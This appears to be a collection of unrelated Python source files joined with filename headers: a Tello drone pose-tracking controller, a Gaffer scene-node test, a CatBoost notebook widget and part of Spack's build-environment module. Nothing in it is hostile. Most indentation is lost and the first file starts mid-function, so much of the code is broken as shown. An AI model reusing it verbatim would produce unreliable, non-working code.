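    positions, confidence = argmax2d(heatmaps)      # grid cell of each keypoint
    vectors = get_offsetVector(positions, offsets)  # sub-cell refinement
    return positions * 32 + vectors                 # keypoint positions in pixels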
MODEL_NAME = "pose_TFLite_model"
GRAPH_NAME = 'detect.tflite'
LABELMAP_NAME = 'labelmap.txt'
resW, resH = '952x720'.split('x')
imW, imH = int(resW), int(resH)
use_TPU = False
min_thresh = 0.7
# Get path to current working directory
CWD_PATH = os.getcwd()
# Path to .tflite file, which contains the model that is used for object detection
PATH_TO_CKPT = os.path.join(CWD_PATH,MODEL_NAME,GRAPH_NAME)
# Path to label map file
PATH_TO_LABELS = os.path.join(CWD_PATH,MODEL_NAME,LABELMAP_NAME)
# Load the label map
with open(PATH_TO_LABELS, 'r') as f:
labels = [line.strip() for line in f.readlines()]
# Have to do a weird fix for label map if using the COCO "starter model" from
# https://www.tensorflow.org/lite/models/object_detection/overview
# First label is '???', which has to be removed.
if labels[0] == '???':
del(labels[0])
# Load the Tensorflow Lite model.
# If using Edge TPU, use special load_delegate argument
if use_TPU:
interpreter = Interpreter(model_path=PATH_TO_CKPT,
experimental_delegates=[load_delegate('libedgetpu.so.1.0')])
print(PATH_TO_CKPT)
else:
interpreter = Interpreter(model_path=PATH_TO_CKPT)
interpreter.allocate_tensors()
# Get model details
input_details = interpreter.get_input_details()
output_details = interpreter.get_output_details()
height = input_details[0]['shape'][1]
width = input_details[0]['shape'][2]
floating_model = (input_details[0]['dtype'] == np.float32)
input_mean = width/2
input_std = width/2
# Initialize frame rate calculation
frame_rate_calc = 1
freq = cv2.getTickFrequency()
#posenet
def main():
""" Create a tello controller and show the video feed."""
tellotrack = TelloCV()
# for packet in tellotrack.container.demux((tellotrack.vid_stream,)):
# for frame in packet.decode():
# start = time.time()
# image = tellotrack.process_frame(frame)
# print("image_time",time.time()-start)
# cv2.imshow('tello', image)
# _ = cv2.waitKey(1) & 0xFF
#posenet
try:
threading.Thread(target=tellotrack.recv_thread).start()
while True:
if frame is None:
time.sleep(0.01)
else:
# print("frame FOUNDD")
image = tellotrack.process_frame(frame)
cv2.imshow('Original', image)
# cv2.imshow('Canny', cv2.Canny(image, 100, 200))
cv2.waitKey(1)
# long delay
# time.sleep(0.5)
image = None
except Exception as ex:
exc_type, exc_value, exc_traceback = sys.exc_info()
traceback.print_exception(exc_type, exc_value, exc_traceback)
print(ex)
finally:
run_recv_thread = False
cv2.destroyAllWindows()
#posenet
class TelloCV(object):
"""
TelloTracker builds keyboard controls on top of TelloPy as well
as generating images from the video stream and enabling opencv support
"""
def __init__(self):
self.prev_flight_data = None
self.record = False
self.tracking = False
self.keydown = False
self.date_fmt = '%Y-%m-%d_%H%M%S'
self.speed = 50
self.drone = tellopy.Tello()
self.init_drone() #posenet
self.init_controls()
# container for processing the packets into frames
self.container = av.open(self.drone.get_video_stream())
self.vid_stream = self.container.streams.video[0]
self.out_file = None
self.out_stream = None
self.out_name = None
self.start_time = time.time()
# tracking a color
green_lower = (30, 50, 50)
green_upper = (80, 255, 255)
#red_lower = (0, 50, 50)
# red_upper = (20, 255, 255)
# blue_lower = (110, 50, 50)
# upper_blue = (130, 255, 255)
self.track_cmd = ""
# self.tracker = Tracker(self.vid_stream.height,
# self.vid_stream.width,
# green_lower, green_upper) #posenet
self.tracker = Tracker(720,
960,
green_lower, green_upper) #posenet
#posenet
def recv_thread(self):
global frame
global run_recv_thread
print('start recv_thread()')
# drone = tellopy.Tello()
try:
# self.drone.connect()
# self.drone.wait_for_connection(60.0)
# #posenet
# self.drone.start_video()
# self.drone.subscribe(self.drone.EVENT_FLIGHT_DATA,
# self.flight_data_handler)
# self.drone.subscribe(self.drone.EVENT_FILE_RECEIVED,
# self.handle_flight_received)
#posenet
# container = av.open(self.drone.get_video_stream())
frame_count = 0
while run_recv_thread:
for f in self.container.decode(video=0):
frame_count = frame_count + 1
# skip first 300 frames
if frame_count < 300:
continue
frame = f
time.sleep(0.01)
except Exception as ex:
exc_type, exc_value, exc_traceback = sys.exc_info()
traceback.print_exception(exc_type, exc_value, exc_traceback)
print(ex)
finally:
self.drone.quit()
#posenet
def init_drone(self):
"""Connect, uneable streaming and subscribe to events"""
# self.drone.log.set_level(2)
self.drone.connect()
self.drone.wait_for_connection(60.0) #posenet
self.drone.start_video()
self.drone.subscribe(self.drone.EVENT_FLIGHT_DATA,
self.flight_data_handler)
self.drone.subscribe(self.drone.EVENT_FILE_RECEIVED,
self.handle_flight_received)
def on_press(self, keyname):
"""handler for keyboard listener"""
if self.keydown:
return
try:
self.keydown = True
keyname = str(keyname).strip('\'')
print('+' + keyname)
if keyname == 'Key.esc':
self.drone.quit()
exit(0)
if keyname in self.controls:
key_handler = self.controls[keyname]
if isinstance(key_handler, str):
getattr(self.drone, key_handler)(self.speed)
else:
key_handler(self.speed)
except AttributeError:
print('special key {0} pressed'.format(keyname))
def on_release(self, keyname):
"""Reset on key up from keyboard listener"""
self.keydown = False
keyname = str(keyname).strip('\'')
print('-' + keyname)
if keyname in self.controls:
key_handler = self.controls[keyname]
if isinstance(key_handler, str):
getattr(self.drone, key_handler)(0)
else:
key_handler(0)
def init_controls(self):
"""Define keys and add listener"""
self.controls = {
'w': lambda speed: self.drone.forward(speed),#'forward',
's': 'backward',
'a': 'left',
'd': 'right',
'Key.space': 'up',
'Key.shift': 'down',
'Key.shift_r': 'down',
'q': 'counter_clockwise',
'e': 'clockwise',
'i': lambda speed: self.drone.flip_forward(),
'k': lambda speed: self.drone.flip_back(),
'j': lambda speed: self.drone.flip_left(),
'l': lambda speed: self.drone.flip_right(),
# arrow keys for fast turns and altitude adjustments
'Key.left': lambda speed: self.drone.counter_clockwise(speed),
'Key.right': lambda speed: self.drone.clockwise(speed),
'Key.up': lambda speed: self.drone.up(speed),
'Key.down': lambda speed: self.drone.down(speed),
'Key.tab': lambda speed: self.drone.takeoff(),
'Key.backspace': lambda speed: self.drone.land(),
'p': lambda speed: self.palm_land(speed),
't': lambda speed: self.toggle_tracking(speed),
'r': lambda speed: self.toggle_recording(speed),
'z': lambda speed: self.toggle_zoom(speed),
'Key.enter': lambda speed: self.take_picture(speed)
}
self.key_listener = keyboard.Listener(on_press=self.on_press,
on_release=self.on_release)
self.key_listener.start()
# self.key_listener.join()
def process_frame(self, frame):
"""convert frame to cv2 image and show"""
# Start timer (for calculating frame rate)
t1 = cv2.getTickCount()
image = cv2.cvtColor(numpy.array(
frame.to_image()), cv2.COLOR_RGB2BGR)
image = self.write_hud(image)
if self.record:
self.record_vid(frame)
# xoff, yoff = self.tracker.track(image)
xoff, yoff = 0,0
xLeftWrist, yLeftWrist =0,0
xNose, yNose =0,0
# print("CV xoff{}, yoff {}".format(xoff, yoff))
#posenet
frame_rgb = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
frame_resized = cv2.resize(frame_rgb, (width, height))
input_data = np.expand_dims(frame_resized, axis=0)
# Normalize pixel values if using a floating model (i.e. if model is non-quantized)
if floating_model:
input_data = (np.float32(input_data) - input_mean) / input_std
# Perform the actual detection by running the model with the image as input
interpreter.set_tensor(input_details[0]['index'],input_data)
interpreter.invoke()
        heatmapscores = interpreter.get_tensor(output_details[0]['index'])[0] # Keypoint heatmap scores
        offsets = interpreter.get_tensor(output_details[1]['index'])[0] # Keypoint offset vectors
# define vectorized sigmoid
sigmoid_v = np.vectorize(sigmoid)
# 1 sigmoid
sigmoheatmapscores = sigmoid_v(heatmapscores)
# 2 argmax2d
heatmapPositions,heatmapConfidence = argmax2d(sigmoheatmapscores)
# 3 offsetVectors
offsetVectors = get_offsetVector(heatmapPositions,offsets)
# 4 keypointPositions
outputStride = 32
keypointPositions = heatmapPositions * outputStride + offsetVectors
# 5 draw keypoints
for idx,el in enumerate(heatmapConfidence):
if heatmapConfidence[idx][0] >= min_thresh:
x = round((keypointPositions[idx][1]/width)*imW)
y = round((keypointPositions[idx][0]/height)*imH)
if 'right' in labels[idx]:
cv2.circle(image,(int(x),int(y)), 5, (0,255,0), -1)
elif 'left' in labels[idx]:
cv2.circle(image,(int(x),int(y)), 5, (0,0,255), -1)
elif 'nose' in labels[idx]:
xNose, yNose = int(x),int(y)
xoff, yoff = (x-int(960/2)),(int(720/2)-y)
# print("NOSE xoff{}, yoff {}".format(xoff, yoff))
cv2.circle(image,(int(x),int(y)), 5, (255,0,0), -1)
if 'leftWri' in labels[idx]:
xLeftWrist, yLeftWrist = int(x),int(y)
#posenet
def draw_arrows(frame):
"""Show the direction vector output in the cv2 window"""
#cv2.putText(frame,"Color:", (0, 35), cv2.FONT_HERSHEY_SIMPLEX, 1, 255, thickness=2)
cv2.arrowedLine(frame, (int(960/2), int(720/2)),
(int(960/2 + xoff), int(720/2 - yoff)),
(0, 0, 255), 1)
return frame
# image = self.tracker.draw_arrows(image)
image = draw_arrows(image)
# Calculate framerate
t2 = cv2.getTickCount()
time1 = (t2-t1)/freq
frame_rate_calc= 1/time1
# Draw framerate in corner of frame
cv2.putText(image,
'FPS: {0:.2f}'.format(frame_rate_calc),
(imW-200,30),
cv2.FONT_HERSHEY_SIMPLEX,
1,
(255,255,0),
1,
cv2.LINE_AA)
distance = 150
cmd = ""
# print(yoff)
# print("WRIST {}>>>> NOSE {}???? ".format(yLeftWrist,yNose),yLeftWrist>yNose)
if self.tracking:
# if yLeftWrist>yNose:
# print("RECORDING",yLeftWrist)
# cmd = "r"
# lambda speed: self.toggle_recording(speed)
if xoff < -distance and xoff>-960/2:
cmd = "counter_clockwise"
elif xoff > distance and xoff<960/2:
cmd = "clockwise"
elif yoff < -distance and yoff>-720/2:
cmd = "down"
elif yoff > distance and yoff<720/2:
print("UPPPPPPPPPPPPPPP",yoff)
cmd = "up"
else:
if self.track_cmd is not "":
getattr(self.drone, self.track_cmd)(0)
self.track_cmd = ""
        if cmd != self.track_cmd:
            if cmd != "":
print("track command:", cmd)
getattr(self.drone, cmd)(self.speed)
self.track_cmd = cmd
return image
def write_hud(self, frame):
"""Draw drone info, tracking and record on frame"""
stats = self.prev_flight_data.split('|')
stats.append("Tracking:" + str(self.tracking))
if self.drone.zoom:
stats.append("VID")
else:
stats.append("PIC")
if self.record:
diff = int(time.time() - self.start_time)
mins, secs = divmod(diff, 60)
stats.append("REC {:02d}:{:02d}".format(mins, secs))
for idx, stat in enumerate(stats):
text = stat.lstrip()
cv2.putText(frame, text, (0, 30 + (idx * 30)),
cv2.FONT_HERSHEY_SIMPLEX,
1.0, (255, 0, 0), lineType=30)
return frame
def toggle_recording(self, speed):
"""Handle recording keypress, creates output stream and file"""
if speed == 0:
return
self.record = not self.record
if self.record:
datename = [os.getenv('HOME'), datetime.datetime.now().strftime(self.date_fmt)]
self.out_name = '{}/Pictures/tello-{}.mp4'.format(*datename)
print("Outputting video to:", self.out_name)
self.out_file = av.open(self.out_name, 'w')
self.start_time = time.time()
self.out_stream = self.out_file.add_stream(
'mpeg4', self.vid_stream.rate)
self.out_stream.pix_fmt = 'yuv420p'
self.out_stream.width = self.vid_stream.width
self.out_stream.height = self.vid_stream.height
if not self.record:
print("Video saved to ", self.out_name)
self.out_file.close()
self.out_stream = None
def record_vid(self, frame):
"""
convert frames to packets and write to file
"""
new_frame = av.VideoFrame(
width=frame.width, height=frame.height, format=frame.format.name)
for i in range(len(frame.planes)):
new_frame.planes[i].update(frame.planes[i])
pkt = None
try:
pkt = self.out_stream.encode(new_frame)
except IOError as err:
print("encoding failed: {0}".format(err))
if pkt is not None:
try:
self.out_file.mux(pkt)
except IOError:
print('mux failed: ' + str(pkt))
def take_picture(self, speed):
"""Tell drone to take picture, image sent to file handler"""
if speed == 0:
return
self.drone.take_picture()
def palm_land(self, speed):
"""Tell drone to land"""
if speed == 0:
return
self.drone.palm_land()
def toggle_tracking(self, speed):
""" Handle tracking keypress"""
if speed == 0: # handle key up event
return
self.tracking = not self.tracking
print("tracking:", self.tracking)
return
def toggle_zoom(self, speed):
"""
In "video" mode the self.drone sends 1280x720 frames.
In "photo" mode it sends 2592x1936 (952x720) frames.
The video will always be centered in the window.
In photo mode, if we keep the window at 1280x720 that gives us ~160px on
each side for status information, which is ample.
Video mode is harder because then we need to abandon the 16:9 display size
if we want to put the HUD next to the video.
"""
if speed == 0:
return
self.drone.set_video_mode(not self.drone.zoom)
def flight_data_handler(self, event, sender, data):
"""Listener to flight data from the drone."""
text = str(data)
if self.prev_flight_data != text:
self.prev_flight_data = text
def handle_flight_received(self, event, sender, data):
"""Create a file in ~/Pictures/ to receive image from the drone"""
path = '%s/Pictures/tello-%s.jpeg' % (
os.getenv('HOME'),
datetime.datetime.now().strftime(self.date_fmt))
with open(path, 'wb') as out_file:
out_file.write(data)
print('Saved photo to %s' % path)
if __name__ == '__main__':
main()
|
SceneNodeTest.py
|
##########################################################################
#
# Copyright (c) 2012, John Haddon. All rights reserved.
# Copyright (c) 2013, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import unittest
import threading
import imath
import IECore
import IECoreScene
import Gaffer
import GafferTest
import GafferScene
import GafferSceneTest
class SceneNodeTest( GafferSceneTest.SceneTestCase ) :
def testRootConstraints( self ) :
# we don't allow the root of the scene ("/") to carry objects, transforms,
# or attributes. if we did, then there wouldn't be a sensible way of merging
# them (particularly transforms) when a Group node has multiple inputs.
# it's also pretty confusing to have stuff go on at the root level,
# particularly as the root isn't well represented in the HierarchyView editor,
# and applications like maya don't have stuff happening at the root
# level either. we achieve this by having the SceneNode simply not
# call the various processing functions for the root.
node = GafferSceneTest.CompoundObjectSource()
node["in"].setValue(
IECore.CompoundObject( {
"object" : IECoreScene.SpherePrimitive()
} )
)
self.assertEqual( node["out"].object( "/" ), IECore.NullObject() )
node = GafferSceneTest.CompoundObjectSource()
node["in"].setValue(
IECore.CompoundObject( {
"transform" : IECore.M44fData( imath.M44f().translate( imath.V3f( 1 ) ) )
} )
)
self.assertEqual( node["out"].transform( "/" ), imath.M44f() )
node = GafferSceneTest.CompoundObjectSource()
node["in"].setValue(
IECore.CompoundObject( {
"attributes" : IECore.CompoundObject()
} )
)
self.assertEqual( node["out"].attributes( "/" ), IECore.CompoundObject() )
def testTypeNamePrefixes( self ) :
self.assertTypeNamesArePrefixed( GafferScene, namesToIgnore = set( ( "PathMatcherData", "Gaffer::PathMatcherDataPlug" ) ) )
def testDefaultNames( self ) :
self.assertDefaultNamesAreCorrect( GafferScene )
def testRootAttributes( self ) :
# create node inheriting from SceneNode:
node = GafferScene.CustomAttributes()
node["attributes"].addOptionalMember( "user:foobar", True, enabled = True )
# scene nodes always have passthrough behaviour for attributes at the root, so this particular one should return an empty compound object:
context = Gaffer.Context()
context.set( "scene:path", IECore.InternedStringVectorData([]) )
with context:
self.assertEqual( node["out"]["attributes"].getValue(), IECore.CompoundObject() )
# unless the caching system is misbehaving, it should return the attribute values we asked for at other locations:
context.set( "scene:path", IECore.InternedStringVectorData(["yup"]) )
with context:
self.assertEqual( node["out"]["attributes"].getValue(), IECore.CompoundObject({'user:foobar':IECore.BoolData( 1 )}) )
def testRootObject( self ):
# okie dokie - create a sphere node and check it's generating a sphere in the correct place:
sphere = GafferScene.Sphere()
context = Gaffer.Context()
context.set("scene:path", IECore.InternedStringVectorData(["sphere"]) )
with context:
self.assertEqual( sphere["out"]["object"].getValue().typeId(), IECoreScene.MeshPrimitive.staticTypeId() )
# right, now subtree it. If the cache is behaving itself, then there shouldn't be an object at the root of the
# resulting scene, cuz that aint allowed.
subTree = GafferScene.SubTree()
subTree["in"].setInput( sphere["out"] )
subTree["root"].setValue("sphere")
context.set("scene:path", IECore.InternedStringVectorData([]) )
with context:
self.assertEqual( subTree["out"]["object"].getValue().typeId(), IECore.NullObject.staticTypeId() )
def testRootTransform( self ):
# okie dokie - create a sphere node and check it's generating a sphere in the correct place:
sphere = GafferScene.Sphere()
sphere["transform"]["translate"]["x"].setValue( 1.0 )
sphere["transform"]["translate"]["y"].setValue( 2.0 )
sphere["transform"]["translate"]["z"].setValue( 3.0 )
context = Gaffer.Context()
context.set("scene:path", IECore.InternedStringVectorData(["sphere"]) )
with context:
self.assertEqual( sphere["out"]["transform"].getValue(), imath.M44f().translate( imath.V3f( 1,2,3 ) ) )
# right, now subtree it. If the cache is behaving itself, then the transform at the root of the
# resulting scene should be set to identity.
subTree = GafferScene.SubTree()
subTree["in"].setInput( sphere["out"] )
subTree["root"].setValue("sphere")
context.set("scene:path", IECore.InternedStringVectorData([]) )
with context:
self.assertEqual( subTree["out"]["transform"].getValue(), imath.M44f() )
def testCacheThreadSafety( self ) :
p1 = GafferScene.Plane()
p1["divisions"].setValue( imath.V2i( 50 ) )
p2 = GafferScene.Plane()
p2["divisions"].setValue( imath.V2i( 51 ) )
g = GafferScene.Group()
g["in"][0].setInput( p1["out"] )
g["in"][1].setInput( p2["out"] )
# not enough for both objects - will cause cache thrashing
Gaffer.ValuePlug.setCacheMemoryLimit( p1["out"].object( "/plane" ).memoryUsage() )
exceptions = []
def traverser() :
try :
GafferSceneTest.traverseScene( g["out"] )
			except Exception as e :
exceptions.append( e )
threads = []
for i in range( 0, 10 ) :
thread = threading.Thread( target = traverser )
threads.append( thread )
thread.start()
for thread in threads :
thread.join()
for e in exceptions :
raise e
def testNodesConstructWithDefaultValues( self ) :
self.assertNodesConstructWithDefaultValues( GafferScene )
def testDerivingInPython( self ) :
# We allow deriving in Python for use as a "shell" node containing
# an internal node network which provides the implementation. But
# we don't allow the overriding of the compute*() and hash*() methods
# because the performance would be abysmal.
class SphereOrCube( GafferScene.SceneNode ) :
Type = IECore.Enum.create( "Sphere", "Cube" )
def __init__( self, name = "SphereOrCube" ) :
GafferScene.SceneNode.__init__( self, name )
self["type"] = Gaffer.IntPlug(
defaultValue = int( self.Type.Sphere ),
minValue = int( self.Type.Sphere ),
maxValue = int( self.Type.Cube ),
)
self["__sphere"] = GafferScene.Sphere()
self["__sphere"]["enabled"].setInput( self["enabled"] )
self["__cube"] = GafferScene.Cube()
self["__cube"]["enabled"].setInput( self["enabled"] )
self["__primitiveSwitch"] = GafferScene.SceneSwitch()
self["__primitiveSwitch"]["index"].setInput( self["type"] )
self["__primitiveSwitch"]["in"][0].setInput( self["__sphere"]["out"] )
self["__primitiveSwitch"]["in"][1].setInput( self["__cube"]["out"] )
self["out"].setInput( self["__primitiveSwitch"]["out"] )
IECore.registerRunTimeTyped( SphereOrCube )
Gaffer.Metadata.registerNode(
SphereOrCube,
"description",
"""
A little test node
""",
plugs = {
"type" : [
"description",
"""
Pick yer lovely primitive here.
""",
"preset:Sphere", int( SphereOrCube.Type.Sphere ),
"preset:Cube", int( SphereOrCube.Type.Cube ),
]
}
)
n = SphereOrCube()
self.assertEqual( n["out"].childNames( "/"), IECore.InternedStringVectorData( [ "sphere" ] ) )
n["type"].setValue( int( n.Type.Cube ) )
self.assertEqual( n["out"].childNames( "/"), IECore.InternedStringVectorData( [ "cube" ] ) )
n["enabled"].setValue( False )
self.assertEqual( n["out"].childNames( "/"), IECore.InternedStringVectorData() )
self.assertEqual(
Gaffer.Metadata.value( n, "description" ),
"A little test node",
)
self.assertEqual(
Gaffer.Metadata.value( n["type"], "description" ),
"Pick yer lovely primitive here.",
)
self.assertEqual( Gaffer.NodeAlgo.presets( n["type"] ), [ "Sphere", "Cube" ] )
def setUp( self ) :
GafferSceneTest.SceneTestCase.setUp( self )
self.__previousCacheMemoryLimit = Gaffer.ValuePlug.getCacheMemoryLimit()
def tearDown( self ) :
GafferSceneTest.SceneTestCase.tearDown( self )
Gaffer.ValuePlug.setCacheMemoryLimit( self.__previousCacheMemoryLimit )
if __name__ == "__main__":
unittest.main()
|
ipythonwidget.py
|
import os
import csv
import time
from threading import Thread
from IPython.core.display import display, HTML
from traitlets import Unicode, Dict, default
from ipywidgets import DOMWidget, Layout, widget_serialization
class CatboostIpythonWidget(DOMWidget):
_view_name = Unicode('CatboostIpythonWidgetView').tag(sync=True)
_view_module = Unicode('catboost_module').tag(sync=True)
data = Dict({}).tag(sync=True, **widget_serialization)
def __init__(self, train_dir):
        super(CatboostIpythonWidget, self).__init__()
self.train_dir = train_dir
@default('layout')
def _default_layout(self):
return Layout(height='500px', align_self='stretch')
def update_widget(self, subdirs=False):
        # wait for training to start (meta.tsv to appear)
self.init_static()
time.sleep(1.0)
self.update_data(subdirs=subdirs)
display(self)
while self.needUpdate:
self.update_data(subdirs=subdirs)
time.sleep(2.0)
def run_update(self):
thread = Thread(target=self.update_widget, args=())
thread.start()
def get_subdirectories(self, a_dir):
return [{'name': name, 'path': os.path.join(a_dir, name)}
for name in os.listdir(a_dir) if os.path.isdir(os.path.join(a_dir, name))]
def update_data(self, subdirs=False):
data = {}
dirs = [{'name': 'current', 'path': self.train_dir}]
needUpdate = False
if subdirs:
dirs = self.get_subdirectories(self.train_dir)
for dir_info in dirs:
path = dir_info.get('path')
content = self.update_data_from_dir(path)
if not content:
continue
data[path] = {
'path': path,
'name': dir_info.get('name'),
'content': content
}
if not needUpdate:
needUpdate = data[path]['content']['passed_iterations'] < data[path]['content']['total_iterations']
self.data = data
self.needUpdate = needUpdate
def update_data_from_dir(self, path):
data = {
'learn_error': [],
'test_error': [],
'time_left': '',
'meta': []
}
meta_tsv = os.path.join(path, 'meta.tsv')
if os.path.isfile(meta_tsv):
with open(meta_tsv, 'r') as meta_in:
data['meta'] = {}
for row in list(csv.reader(meta_in, delimiter='\t')):
if not len(row):
continue
if row[0] != 'loss':
data['meta'][row[0]] = row[1]
else:
data['meta'][row[0] + '_' + row[1]] = row[2]
logs = {
'test_error': data['meta']['testErrorLog'] if 'testErrorLog' in data['meta'] else 'test_error.tsv',
'learn_error': data['meta']['learnErrorLog'] if 'learnErrorLog' in data['meta'] else 'learn_error.tsv',
'time_left': data['meta']['timeLeft'] if 'timeLeft' in data['meta'] else 'time_left.tsv'
}
for error_type in logs:
file_path = os.path.join(path, logs[error_type])
if os.path.isfile(file_path):
with open(file_path, 'r') as f:
data[error_type] = list(csv.reader(f, delimiter='\t'))
passed_test_iterations = len(data['test_error']) - 1
passed_learn_iterations = len(data['learn_error']) - 1
passed_iterations = 0
if (passed_test_iterations > 0 and passed_learn_iterations > 0):
passed_iterations = min(passed_test_iterations, passed_learn_iterations)
elif passed_test_iterations > 0:
passed_iterations = passed_test_iterations
elif passed_learn_iterations > 0:
passed_iterations = passed_learn_iterations
if data['meta'] and data['meta']['iterCount']:
return {
'passed_iterations': passed_iterations,
'total_iterations': int(data['meta']['iterCount']),
'rows': data
}
else:
return None
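    # Hedged illustration (values invented) of the tab-separated meta.tsv layout
    # the parsing above expects:
    #
    #   iterCount       1000
    #   learnErrorLog   learn_error.tsv
    #   testErrorLog    test_error.tsv
    #   timeLeft        time_left.tsv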
@staticmethod
def get_static_path(file_name):
return os.path.join(os.path.dirname(__file__), file_name)
def init_static(self):
with open(self.get_static_path('CatboostIpython.css')) as f:
css = f.read()
js = ''
# never use require in your projects
js += 'window.__define = window.define;window.__require = window.require;window.define = undefined;window.require = undefined;'
with open(self.get_static_path('plotly-basic.min.js')) as f:
js += f.read()
js += 'window.define = window.__define;window.require = window.__require;window.__define = undefined; window.__require = undefined;'
with open(self.get_static_path('CatboostIpythonPlotly.js')) as f:
js += f.read()
with open(self.get_static_path('CatboostIpythonInit.js')) as f:
js += f.read()
html = """
<style>
{}
</style>
<script>
{}
</script>
""".format(css, js)
display(HTML(html))
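# Hedged usage sketch (the directory name is illustrative): render the widget
# for a CatBoost training directory and keep refreshing it in the background.
#
#   widget = CatboostIpythonWidget('catboost_info')
#   widget.run_update()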
|
build_environment.py
|
# Copyright 2013-2019 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
"""
This module contains all routines related to setting up the package
build environment. All of this is set up by package.py just before
install() is called.
There are two parts to the build environment:
1. Python build environment (i.e. install() method)
This is how things are set up when install() is called. Spack
takes advantage of each package being in its own module by adding a
bunch of command-like functions (like configure(), make(), etc.) in
   the package's module scope. This allows package writers to call
them all directly in Package.install() without writing 'self.'
everywhere. No, this isn't Pythonic. Yes, it makes the code more
readable and more like the shell script from which someone is
likely porting.
2. Build execution environment
This is the set of environment variables, like PATH, CC, CXX,
etc. that control the build. There are also a number of
environment variables used to pass information (like RPATHs and
other information about dependencies) to Spack's compiler wrappers.
All of these env vars are also set up here.
Skimming this module is a nice way to get acquainted with the types of
calls you can make from within the install() function.
"""
import inspect
import multiprocessing
import os
import shutil
import sys
import traceback
import types
from six import iteritems
from six import StringIO
import llnl.util.tty as tty
from llnl.util.tty.color import cescape, colorize
from llnl.util.filesystem import mkdirp, install, install_tree
from llnl.util.lang import dedupe
import spack.build_systems.cmake
import spack.build_systems.meson
import spack.config
import spack.main
import spack.paths
import spack.store
from spack.util.string import plural
from spack.util.environment import (
env_flag, filter_system_paths, get_path, is_system_path,
EnvironmentModifications, validate, preserve_environment)
from spack.util.environment import system_dirs
from spack.error import NoLibrariesError, NoHeadersError
from spack.util.executable import Executable
from spack.util.module_cmd import load_module, get_path_from_module
from spack.util.log_parse import parse_log_events, make_log_context
#
# This can be set by the user to globally disable parallel builds.
#
SPACK_NO_PARALLEL_MAKE = 'SPACK_NO_PARALLEL_MAKE'
#
# These environment variables are set by
# set_build_environment_variables and used to pass parameters to
# Spack's compiler wrappers.
#
SPACK_ENV_PATH = 'SPACK_ENV_PATH'
SPACK_INCLUDE_DIRS = 'SPACK_INCLUDE_DIRS'
SPACK_LINK_DIRS = 'SPACK_LINK_DIRS'
SPACK_RPATH_DIRS = 'SPACK_RPATH_DIRS'
SPACK_RPATH_DEPS = 'SPACK_RPATH_DEPS'
SPACK_LINK_DEPS = 'SPACK_LINK_DEPS'
SPACK_PREFIX = 'SPACK_PREFIX'
SPACK_INSTALL = 'SPACK_INSTALL'
SPACK_DEBUG = 'SPACK_DEBUG'
SPACK_SHORT_SPEC = 'SPACK_SHORT_SPEC'
SPACK_DEBUG_LOG_ID = 'SPACK_DEBUG_LOG_ID'
SPACK_DEBUG_LOG_DIR = 'SPACK_DEBUG_LOG_DIR'
SPACK_CCACHE_BINARY = 'SPACK_CCACHE_BINARY'
SPACK_SYSTEM_DIRS = 'SPACK_SYSTEM_DIRS'
# Platform-specific library suffix.
dso_suffix = 'dylib' if sys.platform == 'darwin' else 'so'
class MakeExecutable(Executable):
"""Special callable executable object for make so the user can specify
parallelism options on a per-invocation basis. Specifying
'parallel' to the call will override whatever the package's
global setting is, so you can either default to true or false and
override particular calls. Specifying 'jobs_env' to a particular
call will name an environment variable which will be set to the
parallelism level (without affecting the normal invocation with
-j).
Note that if the SPACK_NO_PARALLEL_MAKE env var is set it overrides
everything.
"""
def __init__(self, name, jobs):
super(MakeExecutable, self).__init__(name)
self.jobs = jobs
def __call__(self, *args, **kwargs):
"""parallel, and jobs_env from kwargs are swallowed and used here;
remaining arguments are passed through to the superclass.
"""
disable = env_flag(SPACK_NO_PARALLEL_MAKE)
parallel = (not disable) and kwargs.pop('parallel', self.jobs > 1)
if parallel:
args = ('-j{0}'.format(self.jobs),) + args
jobs_env = kwargs.pop('jobs_env', None)
if jobs_env:
# Caller wants us to set an environment variable to
# control the parallelism.
kwargs['extra_env'] = {jobs_env: str(self.jobs)}
return super(MakeExecutable, self).__call__(*args, **kwargs)
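# Illustrative sketch (an assumption, not taken from Spack's test suite) of how
# the per-invocation knobs described in the class docstring are typically used:
#
#     make = MakeExecutable('make', jobs=8)
#     make()                               # runs `make -j8`
#     make('install', parallel=False)      # runs `make install` with no -j flag
#     make('check', jobs_env='TEST_JOBS')  # runs `make -j8 check` with TEST_JOBS=8 in the environment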
def clean_environment():
# Stuff in here sanitizes the build environment to eliminate
# anything the user has set that may interfere. We apply it immediately
# unlike the other functions so it doesn't overwrite what the modules load.
env = EnvironmentModifications()
# Remove these vars from the environment during build because they
# can affect how some packages find libraries. We want to make
# sure that builds never pull in unintended external dependencies.
env.unset('LD_LIBRARY_PATH')
env.unset('LIBRARY_PATH')
env.unset('CPATH')
env.unset('LD_RUN_PATH')
env.unset('DYLD_LIBRARY_PATH')
build_lang = spack.config.get('config:build_language')
if build_lang:
# Override language-related variables. This can be used to force
# English compiler messages etc., which allows parse_log_events to
# show useful matches.
env.set('LC_ALL', build_lang)
